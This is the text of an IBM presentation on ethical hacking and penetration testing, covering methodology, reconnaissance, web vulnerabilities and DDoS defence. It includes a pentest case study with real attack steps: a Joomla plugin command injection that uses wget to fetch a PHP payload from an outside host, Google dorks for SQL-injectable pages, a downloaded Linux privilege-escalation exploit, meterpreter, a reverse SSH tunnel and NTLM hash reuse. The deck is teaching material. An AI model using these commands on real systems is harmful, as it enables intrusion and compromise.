have a smartphone? scan me - gse young professionals - ethical hacking and pentesting.pdf · have a...

Ethical Hacking and Pentesting Vito Rallo, IBM Security Services Penetration Testing

Have a Smartphone? SCAN ME

©2013 IBM Corporation

Hackers and Ethical Hackers

The hacker manifesto: “Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.”


Having fun in Security § Ethical hackers enjoy the most exciting part of

Security?

Network Security

Data Security

Application Security

Mobile Security

Cloud Security

Availability

Compliancy

Management

TESTING


Penetration testing through the years §  early pentesting was a black art §  true penetration testing skills were learned

§  there was no semblance of a commonly-accepted methodology, every pentester used to write his own

§  In late 2000 open source security testing methodology the OSSTMM

§  Pentest widespread, tools and knowledge

§  IBM has done pentest since 1995


Outline of activities

§ The IBM penetration testing methodology includes:

–  Project initiation –  Reconnaissance –  Discovery and assessment

–  Perimeter or internal attack –  Exploitation –  Findings and analysis –  Deliverables (report)


Today: the new pentesting

A good pentesting is made by PEOPLE not by TOOLS

It’s crucial understanding the process of an attack, not just the tools and the vulns but the actual mindset to use to break in

Pentest is not a project, it’s a PROCESS!

There is plenty of companies who will teach you “ethical hacking”, “applied pentesting”, books, tools and so on. None of them will give you the hacking mindset.


Client Values and Deliverables Penetration testing services can deliver:

An effective, affordable service that provides a “hacker’s-eye” view of a client’s security posture


What IBM can deliver

§  In-depth assessment of vulnerabilities only found through source code analysis

§ Map with regulations such as PCI, DISA, FISMA, and Sarbanes-Oxley, and best practices including the OWASP Top 10

Application Source Code Assessment

§ Functional review of the application from both a client and server perspective

§ Comprehensive vulnerability assessment of the application and network infrastructure directly supporting the application

§  Mobile Applications Assessment

Application and Mobile Security Assessment

Leverages IBM Rational® AppScan® software

Penetration testing

Assessment of application vulnerabilities Leverages IBM Rational®

AppScan® Source Edition

§ Coporate networks and local infrastructures (remote/onsite)

§ WebApplications (blackbox/graybox)

§ Mobile and Embedded device testing (e.g. iPhone, Android)

§ SCADA control systems for utility and power companies

§ Client Server Apps and Mobile apps

§ Reverse engineering and exploit development


DoS attacks categories § Network (L4 attacks)

–  TCP/UDP/ICMP Floods

–  Protocol Specific Weaknesses

§ Application (L7 attacks) –  HTTP

–  Slow Loris, R.U.D.Y, etc

–  SSL

–  DNS


DDoS Defence Strategy § Many providers/services à cloud service

–  Scrub Services (clean pipe) –  MSS and Carrier Cloud Netflow

§ Mostly based on: Anomalies Analysis/Signature based detection

§ Common patterns: In-premises mitigations, Out-premises mitigation

§ Pain points: decentralization of the internet §  Ideally, block attacks closest the source


New generation remediation trends § Overlay Networks

–  Large distributed nodes, reverse proxies, bleeding edge known mitigation services (AKAMAI)

12

Let’s get into the business Pentest in real life


Reconnaissance §  DNS – Domain – IP à

who is §  Social Networks §  Corporate info and so

on… §  Jobs ads.. !? K

./theHarvester.py -d xxx.be -l 500 -b google [-] Searching in Google:

Searching 500 results... [+] Emails found: ------------------ [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] …………..A LOT MORE [+] Hosts found in search engines: ------------------------------------ 1xx.244.74.x:www.xxx.be 1xx.244.x.200:ns.xxx.be 1xx.x.76.200:Ns.xxx.be x.245.3.200:ns2.xxx.be [-] Searching in Linkedin.. Users from Linkedin: ==================== Nico xxxff Nishantxxxxar - Singapore Systems analyst web Fraxx xxxens - Belgium Lucxxx xxxans Systems technology analyst xxx xxxeters Nishant xxxxxxr


Reconnaissance §  Google hacking .. and Dorks

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:":2082/login/?user=" inurl:free.fr/index.php?id= inurl:reservation.php?id= inurl:promotion.php?id= inurl:carte.php?id= inurl:menu.php?id=


Shodan § Google for hackers

§ Search engine of indexed “banners”


Tons and tons of open devices


Vulnerability Discovery

Latest 5 years tendency


Keys issues in WebApp security

•  SQL Injection •  A definition:

“SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.”

•  Cross Site Scripting •  A definition:

“Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users.”


SQL injection in Login


Cross-Site Scripting – The Exploit Process

IBM Confidential


XSS, BeEF

§ Basically a client-exploitation Framework


Establish a toehold § The beginning of the end

–  Compromise a server: force the webapp to upload a malicious file à how? Password discovered, phpinclude, phpupload, exploiting CMS vulns and so on…

–  Now, think about privilege escalation up to root!


French company, call it “Carla” –  Owns several brands

–  Offer Intranet services

–  Hosts website in internal DMZ § Black Box

–  Pure offensive hacking, no whitelisting, event monitoring team

servers (web, ftp) DMZ172.20.10.x

one2one NAT/PAT

extranet.gammvert.fr

www.biotop.fr

www.invivo-group.com

84.x.x.z

84.x.x.y

84.x.x.x


Carla Critical vuln

§ Acajoom, plug in for Joomla (pass to exec)

http://X.X.33.4//components/com_acajoom/self.acajoom.php ?s=system('wget%20http://x.x.x.x/myp.php’)


Privileges Escalation Linux environment analysis (uname –a)

cat /etc/redhat-release

Red Hat Enterprise Linux Server release 5.3 (Tikanga)

cd /tmp wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c

gcc 36038-6.c -o nu ./nu

meterpreter > sysinfo Computer : XXXXwebServer OS : Linux XXXXwebServer 2.6.18-128.el5 #1 SMP Wed Dec 17 11:42:39 EST 2008 i686 Meterpreter : php/php


The final attack scenario

TUNNELL SSH

attacking server

Hacker, attacking station

biotopwebserver inVivo

DMZ172.20.10.x

ServerInfrastructure

(Windows and Linux

hosts)

vuln direct

exploitation

Cont

rol+

Sock

s vp

n

Reverse SSH


Inside the DMZ §  We can now connect TCP to all the inner hosts on the private LAN, scan, discovery,

exploit again…

§  Touching services that are not available from outside the Firewall (firewall cannot catch me).


Windows Domain Escalation §  Just a old unused server § Get in, compromise one § Get NTLM hash for Admin, try on other server..

–  Administrators tends to use the same password for local admin accounts

§ Get another one, search for tokens… –  Service in execution with Domain Admin rights

§ Escalation to the domain controller!

29

The new Unawareness Next years fun


Awareness and unawareness § Web App 5 years ago

–  HTTP Based, GET, POST requests § Web App Today

–  HTML, CSS, Dynamic, AJAX, RoR… –  still some Flash, Java, Silverlight

§ Web App in 2 years


Web Apps in 2 years


Mobile Threat Model

Slide from OWASP


STRIDE Model for Mobile

Slide from OWASP


Testing Framework for apps and devices §  Dynamic Analysis §  Static Analysis

35

Final Considerations Security posture of your enterprise


Compliance is not total security § Scan, Checklists, Security Products.. Will offer you

total bullet-proof security solution?


The right attitude § Confused, Uncertainty, Fear, Unprepared, Proud,

Unclear…


Certainty


Uncertainty § Create Security Intelligence §  Iterate Prevention->Monitor->Response to

dynamically improve the security model


Emergency Response § Helps the customer under emergency contingency:

•  Analysis of computer security incident data to determine the source of the incident, its cause, and its effects;

•  Assist in preventing the effects of the computer security incident from spreading to other computer systems and networks;

•  Assist with stopping the computer security incident at its source and/or protecting Customer’s computer systems and networks from the effects of the computer security incident;

•  Recommendations for restoration of the affected computer systems and networks to normal operations; and

•  Suggesting protection methods for Customer’s computer systems and networks from future similar occurrences

§  Incidents Response; Containment and Remediation (Forensic analysis), Prevention

§ Who they are: high skilled security people, forensics experts, certified analysts and ex-military


Questions…

[email protected]

Vito Rallo @vitorallo

have a smartphone? scan me - gse young professionals - ethical hacking and pentesting.pdf · have a...

Documents